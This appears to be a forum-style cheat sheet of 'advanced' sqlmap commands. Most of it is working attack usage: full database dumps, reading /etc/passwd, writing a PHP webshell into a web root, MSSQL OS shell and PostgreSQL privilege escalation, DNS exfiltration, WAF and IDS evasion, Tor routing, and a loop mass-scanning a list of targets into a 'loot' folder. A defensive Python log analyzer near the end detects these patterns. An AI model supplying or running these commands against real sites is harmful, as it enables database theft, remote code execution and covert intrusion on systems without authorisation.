Advanced sqlmap commands that rarely show up in basic tutorials. Pure black-box techniques for pentesting your own web app (make sure you have permission! 😎)

1. Time-Based Blind (Hardest to Detect)

# Heavy blind injection
sqlmap -u "http://target.com/page.php?id=1" \
--technique=T \
--time-sec=5 \
--threads=1 \
--delay=1 \
--timeout=30 \
--dbs

2. Custom Payload Injection

# Boolean-based custom
sqlmap -u "http://target.com/page.php?id=1" \
--string="Welcome" \
--not-string="Error" \
--dump-all

# Regex matching
sqlmap -u URL --regexp=".*success.*"

3. Stacked Queries (Multiple Statements)

sqlmap -u "http://target.com/page.php?id=1" \
--technique=S \
--dbms=mysql \
--dump

4. Out-of-Band (OOB) - DNS/HTTP Exfil

# DNS exfiltration (stealth)
sqlmap -u URL \
--dns-domain=yourdomain.com \
--threads=5

# HTTP request exfil: sqlmap has no HTTP out-of-band channel, and
# --technique=O, --ooob-backward and --ooob-type are not sqlmap options;
# DNS (--dns-domain above) is its only out-of-band technique

5. File Read/Write (LFI + RCE)

# Read files (--file-dest only applies to --file-write; the read result
# is saved under sqlmap's output directory)
sqlmap -u URL \
--file-read="/etc/passwd"

# Write webshell
sqlmap -u URL \
--file-write=shell.php \
--file-dest=/var/www/html/shell.php

6. Bypass Advanced WAF

# Multi-tamper combo (--hpkp-bypass is not a sqlmap option and has been dropped from this command)
sqlmap -u URL \
--tamper=space2comment,between,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes \
--random-agent \
--force-ssl \
--threads=1 \
--delay=3

7. Session + Auth Bypass

# Authenticate first: HTTP basic auth via --auth-cred, the logged-in session via --cookie
# (--auth-file takes a PEM client certificate, not a cookie file)
sqlmap -u "http://target.com/admin.php" \
--data="user=admin&pass=wrong" \
--auth-type=basic \
--auth-cred="admin:pass" \
--cookie="PHPSESSID=<session cookie from your login>" \
--dump

8. Second-Order SQLi

# Find second-order injection (input stored by search/profile update, triggered on another page)
sqlmap -u "http://target.com/search.php?q=test'" \
--second-order="http://target.com/profile.php"

9. DB-Specific Exploits

# MSSQL - OS cmd execution
sqlmap -u URL \
--dbms=mssql \
--os-shell

# PostgreSQL
sqlmap -u URL \
--dbms=postgresql \
--priv-esc

# Oracle (sqlmap has no --sid option; --dbms=oracle is enough)
sqlmap -u URL \
--dbms=oracle

10. Mass Scanning + Crawling

# Crawl + test all params (--crawl-exclude takes a regex, so alternatives are separated with |)
sqlmap -u "http://target.com" \
--crawl=4 \
--crawl-exclude="logout|admin" \
--forms \
--batch

# Run sqlmap over a list of URLs (one per line in targets.txt)
while IFS= read -r url; do
    sqlmap -u "$url" --batch --dbs >> results.txt
done < targets.txt

11. Stealth Mode (Anti-IDS)

# --skip-waf turns off sqlmap's WAF/IPS detection heuristics, so it cannot be
# combined with --identify-waf (an option removed from newer sqlmap releases)
sqlmap -u URL \
--keep-alive \
--null-connection \
--threads=1 \
--delay=5 \
--safe-url="http://target.com/normalpage.php" \
--safe-freq=3 \
--skip-waf

12. Custom User-Agent Rotation

# --random-agent overrides --user-agent, so use one or the other:
# a fixed UA string, or a random one from sqlmap's built-in list
sqlmap -u URL \
--random-agent \
--headers="Accept: text/html\nReferer: http://google.com"

13. Proxy + Tor

# SOCKS5 proxy
sqlmap -u URL --proxy=socks5://127.0.0.1:9050

# Tor rotation
sqlmap -u URL --tor --tor-type=SOCKS5 --tor-port=9050

14. JSON/XML API Testing

sqlmap -u "http://api.target.com/users?id=1" \
--headers="Content-Type: application/json" \
--data='{"id":1}'

15. Nuclear Option (All-In-One)

# --tamper=all is not a valid value; tamper scripts must be listed by name (see section 6)
sqlmap -u "http://target.com/page.php?id=1" \
--batch \
--level=5 \
--risk=3 \
--threads=10 \
--dbs \
--tables \
--dump-all \
--output-dir=loot/

Quick Test for Your Web App:

# Quick test of every possibility (WAF detection runs by default; --identify-waf has been removed from newer sqlmap)
sqlmap -u "http://webmu.com/vuln.php?id=1" \
--batch \
--forms \
--crawl=2 \
--dbs
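As an added defender-side example (not part of the original post): a small Python access-log analyzer that flags the request patterns the commands above leave behind. It decodes percent- and %uXXXX-encoded query strings (what the charencode/charunicodeencode tampers produce) before matching time-based, stacked-query and comment-obfuscation signatures, and flags clients that rotate User-Agents (--random-agent). The log lines, IPs and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /page.php?id=1;WAITFOR%20DELAY%20'0:0:5' HTTP/1.1" 500 128 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X)"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /page.php?id=1%2f%2a%2a%2fAND%2f%2a%2a%2f1%3d1 HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /page.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Signatures for the post's techniques: time-based blind (section 1), stacked queries (section 3),
# inline-comment obfuscation (space2comment tamper, section 6).
SIGNATURES = {
    "time_based": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|WAITFOR\s+DELAY", re.I),
    "stacked": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP|EXEC|WAITFOR)\b", re.I),
    "comment_obfuscation": re.compile(r"/\*.*?\*/"),
}


def normalize(path):
    """Undo %uXXXX (charunicodeencode) and double percent-encoding before matching."""
    decoded = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), path)
    for _ in range(2):  # two passes catch payloads that were encoded twice
        decoded = unquote_plus(decoded)
    return decoded


def analyze(log_text, min_agents=3):
    """Return {ip: findings} for clients whose requests match a signature
    or that present at least min_agents distinct User-Agents (--random-agent)."""
    clients = defaultdict(lambda: {"signatures": set(), "agents": set(), "requests": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        c = clients[m["ip"]]
        c["requests"] += 1
        c["agents"].add(m["ua"])
        query = normalize(m["path"])
        for name, rx in SIGNATURES.items():
            if rx.search(query):
                c["signatures"].add(name)
    for c in clients.values():
        if len(c["agents"]) >= min_agents:
            c["signatures"].add("ua_rotation")
    return {ip: c for ip, c in clients.items() if c["signatures"]}
```

Point it at a real access log by replacing SAMPLE_LOG with the file contents; the per-client output is what you would feed into an alert or a block list.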

Try them one by one, boss, and see which one hits. Share the results (redact them first) and I'll give you the next step!